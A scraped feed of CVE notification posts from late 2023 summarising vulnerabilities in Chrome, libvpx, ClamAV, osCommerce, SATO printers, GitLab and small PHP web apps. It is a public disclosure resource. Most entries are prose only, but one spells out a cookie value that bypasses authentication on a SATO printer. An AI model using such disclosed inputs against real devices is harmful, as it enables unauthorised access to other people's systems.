| 2023-10-02 05:24:30 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-02 05:24:29 |
🚨 CVE-2023-4900Inappropriate implementation in Custom Tabs in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to obfuscate a permission prompt via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:27 |
🚨 CVE-2023-4901Inappropriate implementation in Prompts in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:26 |
🚨 CVE-2023-4902Inappropriate implementation in Input in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:25 |
🚨 CVE-2023-4903Inappropriate implementation in Custom Mobile Tabs in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:24 |
🚨 CVE-2023-4904Insufficient policy enforcement in Downloads in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to bypass Enterprise policy restrictions via a crafted download. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:23 |
🚨 CVE-2023-4905Inappropriate implementation in Prompts in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-02 05:24:22 |
🚨 CVE-2023-4906Insufficient policy enforcement in Autofill in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-02 05:24:21 |
🚨 CVE-2023-4907Inappropriate implementation in Intents in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-02 05:24:16 |
🚨 CVE-2023-4908Inappropriate implementation in Picture in Picture in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-02 05:24:15 |
🚨 CVE-2023-4909Inappropriate implementation in Interstitials in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-02 05:24:14 |
🚨 CVE-2023-5328A vulnerability classified as critical has been found in SATO CL4NX-J Plus 1.13.2-u455_r2. This affects an unknown part of the component Cookie Handler. The manipulation with the input auth=user,level1,settings; web=true leads to improper authentication. Access to the local network is required for this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-241029 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-02 05:24:13 |
🚨 CVE-2023-5329A vulnerability classified as problematic was found in Field Logic DataCube4 up to 20231001. This vulnerability affects unknown code of the file /api/ of the component Web API. The manipulation leads to improper authentication. The exploit has been disclosed to the public and may be used. VDB-241030 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-02 02:50:20 |
CVE Notify pinned «» |
|
| 2023-10-02 02:50:16 |
None |
|
| 2023-10-02 00:52:01 |
🚨 CVE-2023-5326A vulnerability was found in SATO CL4NX-J Plus 1.13.2-u455_r2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component WebConfig. The manipulation leads to improper authentication. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-241027.🎖@cveNotify |
|
| 2023-10-02 00:52:00 |
🚨 CVE-2023-5327A vulnerability was found in SATO CL4NX-J Plus 1.13.2-u455_r2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /rest/dir/. The manipulation of the argument full leads to path traversal. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241028.🎖@cveNotify |
|
| 2023-10-02 00:51:59 |
🚨 CVE-2023-44488VP9 in libvpx before 1.13.1 mishandles widths, leading to a crash related to encoding.🎖@cveNotify |
|
| 2023-10-02 00:51:58 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-01 22:52:00 |
🚨 CVE-2023-5324A vulnerability has been found in eeroOS up to 6.16.4-11 and classified as critical. This vulnerability affects unknown code of the component Ethernet Interface. The manipulation leads to denial of service. The attack needs to be approached within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241024.🎖@cveNotify |
|
| 2023-10-01 22:51:59 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-01 22:51:58 |
🚨 CVE-2023-20900A malicious actor that has been granted Guest Operation Privileges https://docs.vmware.com/en/VMware-vSphere/8.0/vsphere-security/GUID-6A952214-0E5E-4CCF-9D2A-90948FF643EC.html in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias https://vdc-download.vmware.com/vmwb-repository/dcr-public/d1902b0e-d479-46bf-8ac9-cee0e31e8ec0/07ce8dbd-db48-4261-9b8f-c6d3ad8ba472/vim.vm.guest.AliasManager.html .🎖@cveNotify |
|
| 2023-10-01 20:21:58 |
🚨 CVE-2023-4211A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2023-10-01 17:16:00 |
CVE Notify pinned «» |
|
| 2023-10-01 17:15:56 |
None |
|
| 2023-10-01 16:52:00 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-01 13:22:09 |
🚨 CVE-2023-20052On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.🎖@cveNotify |
|
| 2023-10-01 13:22:08 |
🚨 CVE-2023-20032On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the HFS+ partition file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to execute arbitrary code. This vulnerability is due to a missing buffer size check that may result in a heap buffer overflow write. An attacker could exploit this vulnerability by submitting a crafted HFS+ partition file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the ClamAV scanning process, or else crash the process, resulting in a denial of service (DoS) condition. For a description of this vulnerability, see the ClamAV blog ["https://blog.clamav.net/"].🎖@cveNotify |
|
| 2023-10-01 13:22:07 |
🚨 CVE-2022-20803A vulnerability in the OLE2 file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device.The vulnerability is due to incorrect use of the realloc function that may result in a double-free. An attacker could exploit this vulnerability by submitting a crafted OLE2 file to be scanned by ClamAV on the affected device. An exploit could allow the attacker to cause the ClamAV scanning process to crash, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-10-01 13:22:06 |
🚨 CVE-2022-20792A vulnerability in the regex module used by the signature database load module of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an authenticated, local attacker to crash ClamAV at database load time, and possibly gain code execution. The vulnerability is due to improper bounds checking that may result in a multi-byte heap buffer overwflow write. An attacker could exploit this vulnerability by placing a crafted CDB ClamAV signature database file in the ClamAV database directory. An exploit could allow the attacker to run code as the clamav user.🎖@cveNotify |
|
| 2023-10-01 13:22:02 |
🚨 CVE-2022-20796On May 4, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in Clam AntiVirus (ClamAV) versions 0.103.4, 0.103.5, 0.104.1, and 0.104.2 could allow an authenticated, local attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog.🎖@cveNotify |
|
| 2023-10-01 13:22:01 |
🚨 CVE-2022-20771On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in the TIFF file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.🎖@cveNotify |
|
| 2023-10-01 13:22:00 |
🚨 CVE-2022-20785On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in HTML file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.🎖@cveNotify |
|
| 2023-10-01 13:21:59 |
🚨 CVE-2022-20770On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in CHM file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.🎖@cveNotify |
|
| 2023-10-01 13:21:58 |
🚨 CVE-2022-20698A vulnerability in the OOXML parsing module in Clam AntiVirus (ClamAV) Software version 0.104.1 and LTS version 0.103.4 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to improper checks that may result in an invalid pointer read. An attacker could exploit this vulnerability by sending a crafted OOXML file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process to crash, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-10-01 00:52:24 |
🚨 CVE-2023-43717Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "MSEARCH_HIGHLIGHT_ENABLE_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:23 |
🚨 CVE-2023-43718Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "MSEARCH_ENABLE_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:21 |
🚨 CVE-2023-43719Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "SHIPPING_GENDER_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:20 |
🚨 CVE-2023-43720Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "BILLING_GENDER_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:19 |
🚨 CVE-2023-43721Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "PACKING_SLIPS_SUMMARY_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:18 |
🚨 CVE-2023-43722Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_status_groups_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:16 |
🚨 CVE-2023-43723Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_status_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:15 |
🚨 CVE-2023-43724Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "derb6zmklgtjuhh2cn5chn2qjbm2stgmfa4.oastify.comscription[1][name]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:14 |
🚨 CVE-2023-43725Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_products_status_name_long[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:13 |
🚨 CVE-2023-43726Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_products_status_manual_name_long[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:12 |
🚨 CVE-2023-43727Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "stock_indication_text[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:10 |
🚨 CVE-2023-43728Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "stock_delivery_terms_text[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:09 |
🚨 CVE-2023-43729Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "xsell_type_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:08 |
🚨 CVE-2023-43730Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "countries_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:07 |
🚨 CVE-2023-43731Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "zone_name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-01 00:52:05 |
🚨 CVE-2022-27635Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-10-01 00:52:04 |
🚨 CVE-2022-36351Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-10-01 00:52:03 |
🚨 CVE-2022-38076Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-10-01 00:52:02 |
🚨 CVE-2022-40964Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-10-01 00:52:00 |
🚨 CVE-2022-46329Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-09-30 21:24:04 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 18:54:08 |
🚨 CVE-2022-4956A vulnerability classified as critical has been found in Caphyon Advanced Installer 19.7. This affects an unknown part of the component WinSxS DLL Handler. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. Upgrading to version 19.7.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-240903.🎖@cveNotify |
|
| 2023-09-30 18:54:07 |
🚨 CVE-2023-4508A user able to control file input to Gerbv, between versions 2.4.0 and 2.10.0, can cause a crash and cause denial-of-service with a specially crafted Gerber RS-274X file.🎖@cveNotify |
|
| 2023-09-30 18:54:06 |
🚨 CVE-2021-40393An out-of-bounds write vulnerability exists in the RS-274X aperture macro variables handling functionality of Gerbv 2.7.0 and dev (commit b5f1eacd) and the forked version of Gerbv (commit 71493260). A specially-crafted gerber file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-30 18:54:05 |
🚨 CVE-2021-40394An out-of-bounds write vulnerability exists in the RS-274X aperture macro variables handling functionality of Gerbv 2.7.0 and dev (commit b5f1eacd) and the forked version of Gerbv (commit 71493260). A specially-crafted gerber file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-30 15:26:51 |
🚨 CVE-2023-5302A vulnerability, which was classified as problematic, has been found in SourceCodester Best Courier Management System 1.0. This issue affects some unknown processing of the component Manage Account Page. The manipulation of the argument First Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240941 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-30 15:26:50 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:58 |
🚨 CVE-2023-2460Insufficient validation of untrusted input in Extensions in Google Chrome prior to 113.0.5672.63 allowed an attacker who convinced a user to install a malicious extension to bypass file access checks via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:56 |
🚨 CVE-2023-2462Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to obfuscate main origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:55 |
🚨 CVE-2023-2463Inappropriate implementation in Full Screen Mode in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:53 |
🚨 CVE-2023-2464Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed an attacker who convinced a user to install a malicious extension to perform an origin spoof in the security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:52 |
🚨 CVE-2023-2465Inappropriate implementation in CORS in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:50 |
🚨 CVE-2023-2466Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to spoof the contents of the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-09-30 12:57:48 |
🚨 CVE-2023-2467Inappropriate implementation in Prompts in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to bypass permissions restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-09-30 12:57:46 |
🚨 CVE-2023-2468Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed a remote attacker who had compromised the renderer process to obfuscate the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-09-30 12:57:44 |
🚨 CVE-2023-2461Use after free in OS Inputs in Google Chrome on ChromeOS prior to 113.0.5672.63 allowed a remote attacker who convinced a user to enage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:43 |
🚨 CVE-2023-29334Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2023-09-30 12:57:41 |
🚨 CVE-2023-28261Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-09-30 12:57:40 |
🚨 CVE-2023-28286Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-09-30 12:57:39 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:37 |
🚨 CVE-2023-2134Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:36 |
🚨 CVE-2023-2135Use after free in DevTools in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who convinced a user to enable specific preconditions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:35 |
🚨 CVE-2023-2136Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:33 |
🚨 CVE-2023-2137Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-30 12:57:32 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:30 |
🚨 CVE-2023-1810Heap buffer overflow in Visuals in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 12:57:29 |
🚨 CVE-2023-1811Use after free in Frames in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-30 11:22:25 |
🚨 CVE-2023-5207A vulnerability was discovered in GitLab CE and EE affecting all versions starting 16.0 prior to 16.2.8, 16.3 prior to 16.3.5, and 16.4 prior to 16.4.1. An authenticated attacker could perform arbitrary pipeline execution under the context of another user.🎖@cveNotify |
|
| 2023-09-30 11:22:24 |
🚨 CVE-2023-5298A vulnerability was found in Tongda OA 2017. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/hr/recruit/requirements/delete.php. The manipulation of the argument REQUIREMENTS_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-240938 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-30 11:22:22 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in Safari 17, iOS 16.7 and iPadOS 16.7, macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-30 11:22:21 |
🚨 CVE-2023-20588A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality.🎖@cveNotify |
|
| 2023-09-30 11:22:20 |
🚨 CVE-2023-39742giflib v5.2.1 was discovered to contain a segmentation fault via the component getarg.c.🎖@cveNotify |
|
| 2023-09-30 05:52:23 |
🚨 CVE-2023-43739The 'bookisbn' parameter of the cart.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-30 05:52:22 |
🚨 CVE-2023-44163The 'search' parameter of the process_search.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-30 05:52:21 |
🚨 CVE-2023-44164The 'Email' parameter of the process_login.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-30 05:52:20 |
🚨 CVE-2023-44165The 'Password' parameter of the process_login.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-30 05:52:19 |
🚨 CVE-2023-44166The 'age' parameter of the process_registration.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 23:22:10 |
🚨 CVE-2022-35908Cambium Enterprise Wi-Fi System Software before 6.4.2 does not sanitize the ping host argument in device-agent.🎖@cveNotify |
|
| 2023-09-29 23:22:09 |
🚨 CVE-2023-5287** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in BEECMS 4.0. This affects an unknown part of the file /admin/admin_content_tag.php?action=save_content. The manipulation of the argument tag leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240915. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-09-29 23:22:08 |
🚨 CVE-2023-5293A vulnerability, which was classified as critical, was found in ECshop 4.1.5. Affected is an unknown function of the file /admin/leancloud.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240924.🎖@cveNotify |
|
| 2023-09-29 23:22:07 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-29 23:22:06 |
🚨 CVE-2023-43124BIG-IP APM clients may send IP traffic outside of the VPN tunnel. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated🎖@cveNotify |
|
| 2023-09-29 23:22:05 |
🚨 CVE-2023-43655Composer is a dependency manager for PHP. Users publishing a composer.phar to a public web-accessible server where the composer.phar can be executed as a php file may be subject to a remote code execution vulnerability if PHP also has `register_argc_argv` enabled in php.ini. Versions 2.6.4, 2.2.22 and 1.10.27 patch this vulnerability. Users are advised to upgrade. Users unable to upgrade should make sure `register_argc_argv` is disabled in php.ini, and avoid publishing composer.phar to the web as this is not best practice.🎖@cveNotify |
|
| 2023-09-29 23:22:04 |
🚨 CVE-2023-5283A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file teacher_signup.php. The manipulation of the argument firstname/lastname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240911.🎖@cveNotify |
|
| 2023-09-29 23:22:03 |
🚨 CVE-2023-5284A vulnerability classified as critical has been found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file upload_save_student.php. The manipulation of the argument uploaded_file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240912.🎖@cveNotify |
|
| 2023-09-29 23:22:01 |
🚨 CVE-2023-5285A vulnerability classified as critical was found in Tongda OA 2017. Affected by this vulnerability is an unknown functionality of the file general/hr/recruit/recruitment/delete.php. The manipulation of the argument RECRUITMENT_ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-240913 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-29 23:22:00 |
🚨 CVE-2023-5286A vulnerability, which was classified as problematic, has been found in SourceCodester Expense Tracker App v1. Affected by this issue is some unknown functionality of the file add_category.php of the component Category Handler. The manipulation of the argument category_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-240914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-29 23:21:59 |
🚨 CVE-2023-41040GitPython is a python library used to interact with Git repositories. In order to resolve some git references, GitPython reads files from the `.git` directory, in some places the name of the file being read is provided by the user, GitPython doesn't check if this file is located outside the `.git` directory. This allows an attacker to make GitPython read any file from the system. This vulnerability is present in https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175. That code joins the base directory with a user given string without checking if the final path is located outside the base directory. This vulnerability cannot be used to read the contents of files but could in theory be used to trigger a denial of service for the program. This issue has not yet been addressed.🎖@cveNotify |
|
| 2023-09-29 23:21:58 |
🚨 CVE-2023-4505The Staff / Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.🎖@cveNotify |
|
| 2023-09-29 23:21:57 |
